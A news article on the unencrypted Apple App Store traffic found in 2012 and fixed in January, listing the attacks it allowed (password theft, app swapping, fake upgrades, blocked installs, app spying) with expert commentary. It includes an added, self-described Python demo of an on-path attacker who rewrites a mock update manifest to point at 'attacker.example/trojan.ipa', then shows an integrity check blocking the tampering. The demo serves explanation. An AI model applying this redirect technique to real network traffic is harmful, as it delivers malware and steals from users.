Apple announced it had fixed the problem in January, but the researchers who discovered the flaw didn’t write about it until this month.
“I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users,” Elie Bursztein, whose full-time job is with Google, wrote in a personal blog.
Apple did not respond to a request for comment.
Bursztein, along with Bernhard “Bruhns” Brehm of Recurity Labs and Rahul Iyer of Bejoi, found out in July 2012 that communications between Apple’s App Store and consumers using the store were unencrypted, so anyone on the same network could read and alter that traffic. That deficiency opened up users to several kinds of attack on public networks, like those found in an airport or coffee shop, according to Bursztein.
The potential attacks included:
Password Stealing. When a user logged into the App Store, an attacker could slip a phony password request screen into the process, effectively prompting the user to hand over their password. “That Apple ID controls your credit card for buying music and apps; it controls all your backups with all your contacts,” Chet Wisniewski, a security advisor with cyber security software maker Sophos, said in an interview. “That’s pretty sensitive stuff. The Apple ID is similar to Facebook and Google. Once it’s hacked, it cracks open the walnut of your entire digital life.”
App Swapping. A user could be duped into installing an attacker’s app when they think they’re installing legitimate software. A paid app could also be substituted for the free one the user chose.
Fake Upgrades. Cyber thieves could trick a user into installing something other than the app upgrade they think they’re getting.
Installation Prevention. An attacker could keep an app from being installed on a device, either by stripping it from the store’s response before it reaches the device or by tricking the device into thinking the app has already been installed.
App Spying. The App Store’s update check sends the list of applications installed on a device, so an eavesdropper on the network could read it and see everything the user has installed.
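The attacks in the list above all come down to one thing: an on-path attacker can read and rewrite plaintext store traffic. The following is an added example, not code from the article, from Bursztein’s write-up or from Apple: it models the update check as a small JSON exchange (the JSON format, the app identifiers and the URLs are constructed for the example; the real App Store wire format is not described on the page). An attacker object in the middle reads the installed-app list (app spying), rewrites one entry’s download URL and price (app swapping, fake upgrade) and marks another as already installed (installation prevention). The second half adds an HMAC tag over the response as a stand-in for the integrity that a TLS channel gives; a real client relies on HTTPS with certificate verification rather than a shared key, and TLS also hides the request from the eavesdropper, which the tag alone does not.

```python
import hashlib
import hmac
import json

# Constructed sample input: the apps a device reports when it checks for updates.
INSTALLED_APPS = ["com.example.notes", "com.example.maps"]

# Hypothetical shared key used only to illustrate an integrity check (not how the App Store works).
DEMO_KEY = b"demo-shared-secret"


def build_update_request(installed):
    """Device -> store: plaintext list of installed app identifiers (constructed format)."""
    return json.dumps({"installed": installed}).encode()


def store_response(request_bytes):
    """Store -> device: one manifest entry per installed app (constructed format)."""
    req = json.loads(request_bytes)
    manifest = {
        "updates": [
            {"id": app, "url": f"http://store.example/{app}.ipa", "price": 0.0, "installed": False}
            for app in req["installed"]
        ]
    }
    return json.dumps(manifest).encode()


class OnPathAttacker:
    """Someone on the same Wi-Fi who can see and rewrite every plaintext byte."""

    def __init__(self):
        self.seen_apps = []

    def intercept_request(self, data):
        # App spying: the installed-app list is readable in the clear.
        self.seen_apps = json.loads(data)["installed"]
        return data

    def intercept_response(self, data):
        manifest = json.loads(data)
        for entry in manifest["updates"]:
            if entry["id"] == "com.example.notes":
                # App swapping / fake upgrade: point the device at the attacker's binary and charge for it.
                entry["url"] = "http://attacker.example/trojan.ipa"
                entry["price"] = 4.99
            elif entry["id"] == "com.example.maps":
                # Installation prevention: the device believes the app is already installed.
                entry["installed"] = True
        return json.dumps(manifest).encode()


def plaintext_exchange(installed, attacker):
    """The pre-fix situation: nothing on the path is authenticated, so every rewrite lands."""
    req = attacker.intercept_request(build_update_request(installed))
    resp = attacker.intercept_response(store_response(req))
    return json.loads(resp)


def tag_for(body):
    return hmac.new(DEMO_KEY, body, hashlib.sha256).hexdigest()


def authenticated_exchange(installed, attacker):
    """Stand-in for a TLS-protected channel: the device rejects any response whose tag no longer matches.

    Only integrity is modelled here; the request is not hidden from the attacker as TLS would hide it.
    """
    req = build_update_request(installed)
    body = store_response(req)
    tag = tag_for(body)                 # computed by the store before the bytes leave it
    body = attacker.intercept_response(body)
    if not hmac.compare_digest(tag_for(body), tag):
        raise ValueError("update manifest failed integrity check; discarding it")
    return json.loads(body)


if __name__ == "__main__":
    mitm = OnPathAttacker()
    tampered = plaintext_exchange(INSTALLED_APPS, mitm)
    print("attacker learned installed apps:", mitm.seen_apps)
    print("device would fetch:", [e["url"] for e in tampered["updates"]])
    try:
        authenticated_exchange(INSTALLED_APPS, OnPathAttacker())
    except ValueError as err:
        print("authenticated channel:", err)
```

Running it shows the device pulling `trojan.ipa` and skipping the maps update in the plaintext case, and the same rewrite being refused in the authenticated case; the point for a mobile client is that without some form of channel authentication there is nothing on the device side that can tell the two manifests apart.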
With App Store communications vulnerable for so long, it’s a wonder that a significant attack didn’t take place, said HD Moore, CSO of Rapid7 in Boston.
“I’ve seen the hacker community talking about this and demonstrate different techniques,” he said, “but it is surprising that there haven’t been any more wide-scale attacks.”
A limiting factor, he explained, is that the attacker has to be in the same physical area as the target, on the same local network segment or the same wireless network, to carry it out.
The security breakdown could encourage mobile app makers to take another look at their wares, Moore added. “On mobile devices, a lot of folks can’t tell if SSL is on in the background. With desktops and laptops, users have been well-trained to look for that SSL lock icon in the corner.”
The incident could also grab the attention of security shops at online retailers, said Jamz Yaneza, threat research manager at Trend Micro in Cupertino, Calif.
“I think it’s a wake-up call for online retailers who outsource development of apps,” he said. “When they do that, they should make sure those apps use all the encryption that’s required.
“With all the breaches we’ve been hearing about in the past few weeks, now is the time for them to take a close look at how they’re securing customer data.”